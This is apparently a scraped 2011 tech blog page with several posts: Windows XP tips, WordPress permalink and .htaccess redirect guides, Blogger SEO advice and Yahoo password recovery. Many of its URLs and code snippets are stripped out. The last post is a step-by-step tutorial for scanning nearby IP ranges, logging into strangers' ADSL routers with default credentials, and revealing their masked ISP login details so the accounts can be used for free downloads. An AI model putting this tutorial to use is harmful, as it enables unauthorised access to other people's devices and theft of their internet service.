Related Posts Plugin for WordPress, Blogger...


Posted by VdoCity Friday, March 25, 2011 0 comments

There is some trick for you.
STEP#1 Go to
STEP#2 Type in google "google sphere".
STEP#3 Click on "I'm Feeling Lucky".
STEP#4 Move your cursor.
You can also try it with typing "google gravity" on google.


Posted by VdoCity 0 comments

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like Replace this with your chum's real IP address -- they can find this out by going to -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. The next release of Windows XP, codenamed Longhorn, is due out late dis month The next big release is codenamed Blackcomb and will be out in 2010/2011


Posted by VdoCity Wednesday, March 23, 2011 0 comments

Configuring your WordPress permalinks is simple and only takes a second, but understanding what they are and how they work is key to setting up the best permalink structure possible. Your site’s permalinks are like the street address for your site’s web pages. They help both people and robots understand your site’s structure and navigate its contents. There is no “one magic permalink recipe to rule them all,” but keeping a few tips in mind makes it easy to optimize your WordPress permalinks. This DiW article shows you how..

WordPress makes it so easy

WordPress gives you full control over your permalinks. First, you have control over the general structure of your permalinks. Navigate to Settings > Permalinks and you will see several options for configuring your permalinks:

[ Screenshot: WP Permalink Settings ]

This is where you configure the general structure of your permalinks, as seen here with green underline. The portion underlined in red is post/page-specific, and will vary depending on your individual posts and pages. For, we chose the “month and name” format, which creates the following permalinks according to page-view:

* Pages →
* Tag Archives →
* Category Archives →
* Single Posts →

..and so on. The main thing that you want to optimize at this point is the structure of your single-post permalinks. We chose to include the year and month for our posts, but it has been argued that it is better to omit the date entirely, using a “Custom structure” like so:


This simple structure will produce single-post permalinks that include only the post name:

Without the additional date information, this structure is definitely shorter and cleaner, but there may be performance issues involved with using the “name-only” permalink format. Perhaps a good trade-off is to include either the post ID or the year:


I think either of these formats is probably an optimal way to configure your permalinks, but you also want to consider the frequency with which you’ll be posting content. It may be beneficial to further organize/classify your posts by including the month and day as well.

Certain “experts” will tell you that including extraneous date information is bad for SEO. The thinking here is that shorter URLs correspond to a more “flat” directory structure, which may provide some SEO benefits. I think the key is to use what’s necessary and omit any extraneous information.
Post/page-specific permalink structures (slugs!)

Once you’ve defined the general permalink structure in the WordPress Admin, you now have full control over your post-specific and page-specific permalink structures (as seen in the above screenshot, red underline). The part of your permalinks that is specific to each page or post is set in the Write/Edit Post screen in the WordPress Admin.

[ Screenshot: WordPress Post Slugs ]

As shown in the above screenshot, WordPress provides an “Edit” button that enables you to modify the post-specific portion of your permalinks:

[ Screenshot: Editing Post Slugs ]

This feature enables you to customize your post/page-specific permalinks (also known as a post “slug”) according to your current permalink optimization strategy. Here are a few examples of commonly employed “post-slug” strategies:

Don’t even worry about it
Just let WordPress generate the post-specific slug based on the post or page title. Pros: this is certainly the easiest method of creating permalinks because no thought or action is required. Cons: depending on your post title, you could get some pretty long permalinks that look awkward and sloppy.
Remove extraneous words, leave only keywords
I have seen lots of blogs do this. It basically involves using the permalink that WordPress generates based on your title, then going in and removing words like “the”, “and”, and “you”, as well as other pronouns and such. Basically the idea is to leave only keywords in your permalinks. This helps keep them short, focused, and optimized for the search engines.
Customize every permalink with optimized keywords
This is the most labor-intensive strategy, but also potentially the most lucrative in terms of return on investment. The idea here is to research or otherwise understand which keywords your page is going to rank for, and then crafting a post-specific permalink structure based on those keywords. I have seen cases where this is taken to such an extreme that the post slug is completely different than the original post title.

The same goes for both posts and pages, regardless of which method you choose. Personally, I employ a combination of the first two strategies, whereby I go in, write a title, and then look at it and see if there is anything that could be improved. Usually there are several words that need to go, and possibly a keyword or two is added or removed. It’s funny because I usually end up rewriting some of the post content after spending some time actually thinking about what to name it.

There is always a better title than the one you think should be used.

The take-home message here is that, by paying attention to post titles and permalinks, you benefit from improved relevancy and potential SEO advantage.
Think of your users

When visitors land on your page, does the URL make sense? Does it correlate with the page title? These are some of the things to think about while setting up the general structure and post-specific slugs for your permalinks. Look at the permalink and ask yourself if it makes complete sense based on what the user will be looking at on the page. If you get too carried away with optimization, a user may get a sense that something isn’t quite right. Perhaps the post title says something like:

The Best Name-Brand Shoes

..but then the post slug looks something like this:

Perhaps a weak example, but it serves to illustrate the semantic gap that may occur when over-thinking your permalinks.
Think of the search engines

After considering your users, think about what the search engines are going to see when they come crawling your pages. Does the permalink match the content of the page? If you aren’t bothering with changing or optimizing your post slugs, then the answer is probably yes because WordPress generates the slug from the post title.

Also, as mentioned previously, some have argued in favor of a more “flat” directory structure in order to improve the SEO value of your blog. Whether or not this is actually the case is up for discussion, but it always makes sense to keep things as simple and concise as possible. So when deciding on the general structure for your permalinks, ask yourself if you really need a directory structure that is over three levels deep, like this:


That’s going to give you some long permalinks, especially if you just use the default WordPress-generated slugs. When you look at a permalink using “year/month/name” format, you are essentially creating a virtual folder structure with a subdirectory for each part of the permalink – the year represents a directory in which you have a bunch of directories for each month, and within each of those directories there could be as many as 31 subdirectories for each day of the month. Then, within each day of the month, you have the post file itself, which may involve further subdirectories when paging is used. It can get crazy pretty quickly, and even though these subdirectories only exist virtually, to a search spider, there is no practical difference between virtual directories that are deeply nested and actual directories that are deeply nested.

When deciding on your permalink structure, ask yourself if you really need the date built into your permalinks. If you are posting prolifically, then you may want to include the date to help keep things organized. Anything less than a few posts a week, and I would opt to go with something simpler, like maybe “year/post” or “id/post”, as mentioned above.

Another thing that needs considering is the notion of “evergreen content”, which generally refers to content that is intended to stay “fresh” or relevant forever. Regardless how silly this SEO idea happens to be, you may want to consider either omitting or including some sort of date information based on how easily you want the publication date to be recognized by your visitors. I.e., if you are trying to “hide” the post date in hopes that your content will rank for a longer period of time, then you should omit it from the general permalink structure. Conversely, if you aren’t that slimy and want to make it easy for people to know when the post was produced, then throw a year or year/month into the mix. Whatever!
Think simplicity

When it comes to organizing the content of your site, there is a fine balance between being well-organized and keeping things simple. For example, the simplest structure would involve all posts and pages directly under the root domain. Clean and simple, but as time goes on and your post count gets into the hundreds or thousands, it could be a drag trying to sort through everything in a flat directory structure. Thus, another reason why breaking things down into categories or dates may help your long-term organizational and maintenance strategy.

For the post-specific portion of the permalinks (the post slug), it is also wise to keep things simple, but not at the risk of duplicating post names. For example, if you are writing a post about jQuery, you might have a post slug that is simply “jquery”, but it’s not going to be very helpful. First, it probably will never rank for that term. Second, telling users that the article is about “jQuery” is about as useless as it gets for both people and machines. So although that would be the simplest permalink possible, it is your interest to specify a little more clearly the content of your post. It just makes everything easier when meaning is readily available from your permalinks.
Do it before posting

Once you hit the “Publish” button, there is one thing that you shouldn’t change: the post slug. After publishing a post, you can easily and without consequence go back and change the title, meta title, post content, and just about everything else. But as soon as you change that permalink, you will need to 301 redirect the former URL to the new one in order to avoid perpetual 404 errors now and in the future. But, if you do need to change the permalink after posting, here is a simple line of HTAccess to help you eliminate any potential 404 errors:

Redirect 301 /old-post-slug/

So it’s really very simple: we first call the redirect directive, declare it as status 301 (permanent), and then add the old slug followed by the new one. That line will redirect any requests for your previously “slugged” URL to your new URL. For more information on htaccess redirects, check here and here.
Think of the keywords

As discussed, a great way to create focused, relevant permalinks is to remove the fluff and include only the important keywords. Granted, Google et al may already discount simple words such as “if”, “and”, and “the”, but you may also have keywords for which you don’t necessarily want to rank. For example, if you published a post on why Batman is terrible at website design, you may wind up with a auto-generated post slug like this:


The word “at” should probably go, leaving this:


But you may want to rank primarily for the term “website-design”, while “batman” is merely anecdotal, used as example, or whatever. Chances are low that anybody is searching for “batman website design”, but you never know.
WordPress removes stuff too

It should also be noted that WordPress removes certain things from your post/page slugs as well. Namely, any punctuation that is included in your post titles will be removed when WordPress automatically generates the post slug. This is both a good thing and a bad thing, depending on how you look at it. There are certain characters that are not allowed in any URL, so WordPress is wise to remove them for you. On the downside, removal of punctuation and the use of hyphens as replacements for periods can leave you with some rather odd-looking permalinks. For example, when writing about the latest WordPress update, say version 3.1 specifically, writing this as your title:

Introducing WordPress 3.1

..will give you this as the default post slug:


..which to me just looks incorrect, like somebody wasn’t paying attention. Moral of the story: even if you’re too lazy to optimize your permalink slugs, it is wise to be mindful of what’s going on with the auto-generated stuff. In this regard, the WordPress devs made an excellent decision when they decided to move the permalink edit box to just below the post title. I do think it could be a little longer though. Most of the time you need to scroll sideways a bit to see what the entire permalink is looking like.
WordPress short URLs

What about Twitter-friendly “shortlinks” for your posts? Generally even the shortest permalink is going to be too long for tweeting, posting, sharing, etc. There are many ways to create short links, but WordPress actually has two built-in ways to create and display short URLs. Let’s take a look at each:

First is the “old” way of doing it. By default, WordPress uses a query-string format for your URLs. As discussed throughout this article, most WordPress users opt for the “pretty” permalinks instead of going with the “ugly” default URLs. But even when permalinks are used, WordPress still understands the default query-string URL structure, so you can include short links in your posts by doing something like this:

ID; ?>

Shortlinks have become so common that WordPress 3.0 now includes a built-in template tag for this very purpose. All you need to display shortlinks in WordPress 3 and above is include the following code in your theme template file(s):

Either of these methods will output a link with the following URL structure:

Also note that WordPress 3.0 now includes a shortlink in the section of your posts and pages, something like this:

This is in addition to the canoncial link tag that is also included in the section.
WordPress canonical links

WordPress canonical URLs are included in the section of your posts and pages. They look like this:

These canonical links help the search engines better understand the structure and content of your site. By including the canoncial element in your pages, you are telling Google et al which pages are the actual, canonical pages for your site. There are several cases where this is extremely helpful, namely:

* Social media linking often involves shortlinks – specifying a canonical link helps ensure that all of the shortlinking is sorted out and that your actual page gets the credit
* Shopping cart sites that feature lots of query-string URLs – when many links look practically identical, having a canonical link specified helps to sort things out
* Guest posting and other duplicate content – when your content is featured (or scraped) in multiple places around the Web, it is nice to have a clear signal as to which case is canonical

You don’t need htaccess to make changes

What if you want to change the general structure of your permalinks? How do you go about doing that without losing your page rank while creating a mess of 404 errors? In older versions of WordPress, this was a real concern. Many folks began with full-date permalinks and then later realized they wanted cleaner, shorter, “dateless” permalinks instead. To do this back in the day, some HTAccess trickery was required to keep the old links from going nowhere.

Fortunately those days are long gone, as WordPress now automagically handles all the redirecting for you when making changes to the general structure of your permalinks (via the Settings > Permalinks options in the WordPress Admin). All you need to do is change the setting to whatever structure you would like and WordPress takes care of the rest. Just remember to backup your database and htaccess file before making any changes.


Posted by VdoCity 0 comments

Before making changes..

The .htaccess code in this post is designed to work when placed in the web-accessible root .htaccess file of your domain. Before making any changes to this file, make a good backup and keep it on hand just in case. Working with .htaccess is nothing to be afraid of, but it’s critical to not make any mistakes in syntax, spelling, or anything that’s not a comment (#). If you forget a dot working with CSS, your design might look messed up. If you forget a dot working with .htaccess your server will return a 500 – Internal Server Error. If this happens, don’t panic, just upload your backup and everything will be fine.
1. Canonical robots.txt

Help bots and visitors find your robots.txt file no matter what. Given that the robots.txt file should always be located in the root directory, you would think that this wouldn’t be an issue. Unfortunately, bad bots and malicious scripts like to scan for robots.txt files everywhere. Fortunately, this .htaccess snippet eliminates the nonsense by directing any request for “robots.txt” to the actual file in your root directory. If you’re sick of seeing endless requests for nonexistent robots files, this code’s for you:


RewriteBase /
RewriteCond %{REQUEST_URI} !^/robots.txt$ [NC]
RewriteCond %{REQUEST_URI} robots\.txt [NC]
RewriteRule .* [R=301,L]

To use this code, replace with your own domain and include in your web-accessible root directory. These directives collectively redirect all requests for any “robots.txt” file, with the exception of the actual, root robots.txt file. If you need to whitelist a similarly named file, just include the following line beneath the first RewriteCond, replacing the path and file name with your own:

RewriteCond %{REQUEST_URI} !/wordpress/robots.txt$ [NC]

Alternate Method: Instead of using Apache’s rewrite module, we can do the same thing with less code using mod_alias:

RedirectMatch 301 ^/(.*)/robots\.txt

Either method is effective, but mod_alias is optimal for typical sites with only one robots.txt file. If you have multiple robots.txt files, the mod_rewrite method will enable complete granular control from the root .htaccess file.
2. Canonical Favicons

Avatars, gravatars, and favicons are a big hit with malicious scanners. Evil scripts like to traverse your directory structure with requests for commonly used images such as the ubiquitous favicon.ico. So just as with robots.txt, we can stop the madness and redirect any request for “favicon.ico” to the actual file in your root directory.


RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_URI} !^/favicon.ico$ [NC]
RewriteCond %{REQUEST_URI} /favicon(s)?\.?(gif|ico|jpe?g?|png)?$ [NC]
RewriteRule (.*) [R=301,L]

To use this code, replace with your own domain and include in your web-accessible root directory. These directives collectively redirect all requests for any “favicon” or “favicons” with a .png, .gif, .ico, or .jpg extension. To prevent an infinite request loop, the code includes an exception for the actual, root “favicon.ico” file. If you need to whitelist a similarly named file, just include the following line beneath the first RewriteCond, replacing the path and file name with your own:

RewriteCond %{REQUEST_URI} !/images/favicons.png$ [NC]
3. Canonical Sitemaps

Just as idiotic bots can’t seem to find your robots and favicon files, so too are they clueless when it comes to finding your sitemap, even when declared in the robots.txt file. Nefarious bots will ignore your robots suggestions and hammer your site with ill-requests for nonexistent sitemaps. This malicious behavior chews up system resources and wastes bandwidth. To eliminate the waste while helping stupid bots find your sitemap, slip this into your root .htaccess:


RedirectMatch 301 /sitemap\.xml$
RedirectMatch 301 /sitemap\.xml\.gz$

To use this code, edit each rule with your own domains and file paths. The first rule redirects all requests for your regular, uncompressed sitemap, and the second rule redirects all requests for your compressed (gzipped) sitemap. These rules are independent of each other, so feel free to remove either to suit your needs.
4. Canonical Category, Tag, and Search URLs

Out of the box, WordPress returns a 404 – Not Found for the following URLs:

* http://your-domain.tld/blog/tag/
* http://your-domain.tld/blog/search/
* http://your-domain.tld/blog/category/

These are commonly requested URLs that may be leaking valuable page rank. As explained previously, you can use the following slice of .htaccess to redirect these URLs to your home page (or anywhere else):


RedirectMatch 301 ^/tag/$
RedirectMatch 301 ^/search/$
RedirectMatch 301 ^/category/$

To use, place the previous code into your root .htaccess file and replace each with the desired redirect location. Alternately, if WordPress is installed in a subdirectory, use this code instead:


RedirectMatch 301 ^/blog/tag/$
RedirectMatch 301 ^/blog/search/$
RedirectMatch 301 ^/blog/category/$

Again, edit the examples with your actual URLs. A good place to redirect any juice or traffic from these three URLs is the home page. Hopefully future versions of WordPress will handle these redirects internally, but until then, this bit of .htaccess is a simple and effective solution.
5. Canonical Feeds

WordPress generates many different feeds for your site. The default feed configuration works great, but it’s worth including in this post a couple of useful .htaccess tricks:

* Set up canonical feed types (e.g., deliver only RSS2 feeds and redirect other formats)
* Setup FeedBurner feeds and redirect associated feed requests

Each of these techniques are easily achieved with a little .htaccess. Better grab a beverage..
Set up canonical feeds

WordPress provides feeds in four different formats: Atom, RDF, RSS, and RSS2. This variety was useful in the past to accommodate different apps and devices, but these days I think it’s safe to say that most readers and devices can handle any format you throw at it. So instead of having 4x the feeds, you can consolidate your feeds into a single format:


RedirectMatch 301 /feed/(atom|rdf|rss|rss2)/?$
RedirectMatch 301 /comments/feed/(atom|rdf|rss|rss2)/?$

This code will redirect requests for alternate feed formats to your canonical choice for both main-content feed and all-comments feed. To use this code, replace both of the target URLs with your own and place in the web-accessible root directory.
Redirect feeds to FeedBurner

Redirecting feeds to FeedBurner is another useful .htaccess snippet to have in your tool belt. Here are two snippets to do the job – one for main-content and another for all-comments feeds:


RewriteCond %{REQUEST_URI} ^/feed/ [NC]
RewriteCond %{HTTP_USER_AGENT} !(FeedBurner|FeedValidator) [NC]
RewriteRule .* [L,R=302]

RewriteCond %{REQUEST_URI} ^/comments/feed/ [NC]
RewriteCond %{HTTP_USER_AGENT} !(FeedBurner|FeedValidator) [NC]
RewriteRule .* [L,R=302]

The first block redirects all requests for your main-content feed, and the second block handles your all-comments feed. So to use, just replace the mainContentFeed and allCommentsFeed with the URLs of your associated FeedBurner feeds. You may also redirect special category feeds by replicating the pattern with another block of code:

RewriteCond %{REQUEST_URI} ^/category/wordpress/feed/ [NC]
RewriteCond %{HTTP_USER_AGENT} !(FeedBurner|FeedValidator) [NC]
RewriteRule .* [L,R=302]

As before, just replace the URL of your FeedBurner feed in the RewriteRule and test accordingly.
6. Simpler Login URL

Lastly, a cool .htaccess trick for a better user-login experience. A single line of code placed in your root .htaccess file is all it takes:

RewriteRule ^login$ [NC,L]

Edit the with the domain/path of your WordPress installation. Now instead of typing “wp-login.php”, we just type “login” and whoop, there it is.

You could also use RedirectMatch to enable a login URL switch:

RedirectMatch 301 \@admin

The @ prevents the rule from bothering anything else, and RedirectMatch picks up on the switch from anywhere in the site, so regardless of what page you’re on, you just append “@admin”


Posted by VdoCity 0 comments

Want to improve SEO on a Blogspot Blogger blog? This tutorial discusses how bloggers can optimize their blog using SEO techniques to improve indexing of their Blogger Blogspot blog and achieve a better ranking in search engine results.

In this article I will be discussing the following Blogger help tips for SEO:

  • Adding Your Blogger Blog to Major Search Engines
  • Optimizing Blogger Post Titles
  • Utilising Meta Keywords and a Meta Description
  • Using Keywords in Alt Tags and Image Titles
  • Using Target Keywords in Your Post Content
  • Optimizing Blogger Title Tags
  • Optimizing Your Blogger Permalinks
  • Making Use of HTML Heading Tags Within Posts and Post Titles
  • Adding Breadcrumb Navigation to your Blogger Blog

Get Your Blog Listed by Major Search Engines
Add Your Blog to Yahoo and Submit your SitemapGetting listed in the major search engines is a must if you want to get traffic from search engines. I have written several in depth articles about how to add a sitemap to major search engines and how to add your blog to Google, Yahoo and MSN so I will not repeat myself. Follow these articles for step by step walkthroughs

Optimize Your Blogger Post Titles
Major search engines lend a lot of weight to titles so it is important that you craft your post titles carefully. To optimize your post titles make them keyword rich and ensure the title clearly explains what the blog post is about. Try to put your keywords at the beginning of your title for best results and avoid repeating your keywords within the title. Avoid long titles as Google only displays about 65 characters in the search results anyway.

Title tags are important if your Blogger blog is to attract traffic and rank in search engine results. On your blog home page the blog title appears between the title tags while on each individual post page it is the name of the article itself. While the title tags themselves are unseen by the visitor to your blog they are read when search engines crawl your blog.

Search engines use title tags to display your post title as a headline in search engine results. Search engines also display a description of the article either by extracting it from the post content usually by picking up the first 150 characters of your post or by reading the meta description of the post if one exists.

Meta descriptions can be crafted for individual posts in Blogger to good effect. Make descriptions unique for each post and ensure they contain your target keywords and keyword phrases to encourage search engines to extract snippets from them. To find out more about adding a meta description to an individual post please see my article Adding Meta Tags to Blogger Blogspot Blog for Better SEO

Add Meta Tags and Blog Description to Blogger
Adding meta keywords and a blog description to your Blogger Blogspot blog can boost your rankings by helping visitors locate your blog using keyword and keyword phrases. To find out the best method of inserting these into your Blogger blog please refer to my article about Adding Meta Tags to Blogger Blogspot Blog for Better SEO

Use Keywords in Alt Tags and Image Titles
Optimize the images used on your blog by making use of the alt tags and image titles. For some tips on SEO and images please refer to 10 Tips to Build Site Traffic for a Blogspot Blog

Use Target Keywords in Your Post Content
Know Your Blogger blogs keywordsMake sure you know your targeted keywords and use them within your post content. One of the factors in determining rankings is the relevance of the targeted keywords in relationship to the text that appears in the post content.

Change the Order of Post Title and Blog Title for Better SEO
One key change you can make to Blogger that will markedly improve the SEO of your blog is to adjust the title tags.

By default Blogger title tags are not optimized for search engines. The name of the blog appears before the name of the article which is not search engine friendly. Since search engines read left to right and give preference to what appears first having your blog name display before your post title is significant. To improve SEO it pays to adjust the order of title tags so that the your post title appears first:

Blog Title | Post Title


Post Title | Blog Title

To find out how to adjust the title tags of a Blogger Blogspot blog please refer to my article Adjust Blogger Title Tags to Improve SEO

Optimize Your Blogger Permalinks
Hand in hand with a title tag is the permanent permalink that is created when a post is published. If the title of the post is more than about 35 characters long you will strike problems with Blogger because it will shorten the title to a 35-40 character permalink. Some very ugly results happen because of this factor. For instance imagine a permalink such as:

A totally useless permalink results because the blogger keyword has been left off. Learn more about crafting titles and working around the limitations of Blogger permalinks in my article How to Create Search Engine Friendly Permalinks

Optimize Blogger Blogspot Blog Permalinks

Improve SEO by Making Use of Headings for Post Titles
Heading tags are important for optimal SEO. Most templates use html header tags sized &lth2> or &lth3> for the post title. In the past major search engines like Google gave precedence to tags with &lth1> ahead of anything else but how important &lth1> tags are today is less certain. You could tweak the heading size of your post title if you wish however take care to ensure the look of your template isn't compromised. A bigger font will result and this may mean other parts of your blog will need to be adjusted to compensate. To find out what size your blog title is look for the following lines in your template.

&ltb:if cond='data:post.title'>
&lth3 class='post-title entry-title'>
&ltb:if cond=''>
&lta expr:href=''>&t/a>
&ltb:if cond='data:post.url'>
&lta expr:href='data:post.url'>

As can be seen this template blog title is in &lth3&gt. To change the size of the tags just substitute the appropriate header tag where &lth3> appears

Improve SEO By Making Use of Heading Tags Within Posts
Heading tags can be used to good effect in your posts. Make sure you have only one &lth1> heading per page if you have one at all and reserve this for your post title. Make use of &lth2> and &lth3> headings throughout your post to emphasize key points and targeted keywords. Major search engines do take notice of &lth2> and &lth3> headings when crawling your blog. To add emphasis to a heading within your blog simply enclose the heading in &lth3> tags.

Add Breadcrumb Navigation to your Blogger Blog
There is a hack that can be used to add breadcrumb navigation to a Blogger Blogspot blog. Adding breadcrumb navigation can boost your SEO of your blog as well as improving how readers get around.

Add Breadcrumb Navigation to Blogspot Blogger blog for Better SEO
A breadcrumb provides text-based navigation by displaying the visitor's location within a blog. A breadcrumb provides shortcuts to enable visitors to quickly get around your blog and jump from one part of your blog to another. For example a breadcrumb for a post about meta tags would be Home > Meta Tags >Add Meta Tags to Blogger for Better SEO. An anchor text such as 'meta tags' tells search engines about the subject of the linked page. Search engines view a breadcrumb with a text link to relevant keywords in the post as important.

To find out how to add a breadcrumb navigation to your Blogger Blogspot blog please refer to my article Add Breadcrumb Navigation to a Blogger Blog

This article has focused on providing you with solid Blogger SEO advice, tips and tricks for the Blogspot Blogger. It will help you achieve good SEO results for your blog. Good luck. If you have time let me know about your experiences.

There are many chances you would lose your yahoo mail / messenger passwords and would not be able to recover it. Here are some of the steps you need to perform.

Yahoo Mail LogoThe basic and normal procedure for recoving your password is to start with this page where you will be asked with your Yahoo ID and will need to confirm whether you have used credit card previously with this login, because if you would have used a credit card previously your account will be verified with those CC details without any charges. The next step would entering your identity details which you would have submitted while registering this yahoo account like Birthday, ZIP (or Postal) Code, and Country.

If the above information did not assist you, please attempt to request a new password. Remember that our team may not reset your password or remind you of your current password.

To request a new password:
1. Click on the MY ACCOUNT link at the top of the Yahoo! home page.
2. Enter your password.
3. On the Account Information page, click on the CHANGE PASSWORD link.

You will be prompted to change your password to something different. It is recommended your new password not contain any part of your old one, for security reasons. If you have followed the directions above, and are still unable to obtain a new password for your account or feel that your account may have been compromised, please reply to this email with the following information you supplied during your Yahoo! registration.

Yahoo Logo* Yahoo! ID (If you cannot supply this ID, please give your alternate
email address given during your original registration)
* Your name
* Date of birth (mm-dd-yr)
* Your alternate email address
* Secret Question and Answer
* Your city and state
* Zip Code or Postal code you entered during registration
* Your country

If the above solution does not work out , you may have to lose the email because the normally sold softwares which are used for recovering the password are all fraud and they cannot help you to recover the password. All these Yahoo Password Recovery Softwares are fake because none of these can recover the password from yahoo so dont ever buy them.


Posted by VdoCity Tuesday, March 22, 2011 0 comments


Posted by VdoCity 0 comments


Posted by VdoCity 0 comments


Posted by VdoCity Monday, March 21, 2011 0 comments


Posted by VdoCity 0 comments


Posted by VdoCity 0 comments


Posted by VdoCity 0 comments


Posted by VdoCity 0 comments


Posted by VdoCity 0 comments


Posted by VdoCity Saturday, March 19, 2011 0 comments

Hacking ADSL Routers for free accounts

Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.

First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here: JAVA

You will also need to have version 8 OR older of Internet Explorer.

Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:

This image has been resized. Click this bar to view the full image. The original image is sized 615x368.

Now where it says IP range in the first input field we'll enter our IP address (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this:

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:

Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:

And on the display tab choose "Hosts with open ports only":

Then click OK to save the preferences and click start:

After few seconds or minutes you should see your first IP addresses:

This image has been resized. Click this bar to view the full image. The original image is sized 602x360.

Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:

This image has been resized. Click this bar to view the full image. The original image is sized 801x552.

Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:
This image has been resized. Click this bar to view the full image. The original image is sized 798x570.

Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:

This image has been resized. Click this bar to view the full image. The original image is sized 798x564.

And password in this case is: 854179

Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

Hope you liked the tutorial.

How Windows Product Activation Works

